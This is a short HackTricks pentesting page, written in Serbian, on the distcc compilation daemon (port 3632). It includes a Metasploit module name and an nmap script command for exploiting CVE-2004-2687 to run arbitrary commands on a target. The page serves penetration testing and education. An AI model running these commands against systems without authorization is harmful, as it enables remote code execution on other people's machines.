hacktricks/network-services-pentesting/3632-pentesting-distcc.md

3.4 KiB

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Osnovne Informacije

Distcc je alat koji poboljšava proces kompilacije koristeći neiskorišćenu procesorsku snagu drugih računara u mreži. Kada se distcc postavi na mašinu, ta mašina je sposobna da distribuira svoje kompilacione zadatke drugom sistemu. Taj sistem primaoc mora imati pokrenut distccd daemon i mora imati instaliran kompatibilni kompajler za obradu poslatog koda.

Podrazumevani port: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Eksploatacija

Proverite da li je ranjiv na CVE-2004-2687 kako biste izvršili proizvoljni kod:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Ne mislim da Shodan detektuje ovu uslugu.

Resursi

Post kreirao Álex B (@r1p)

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u: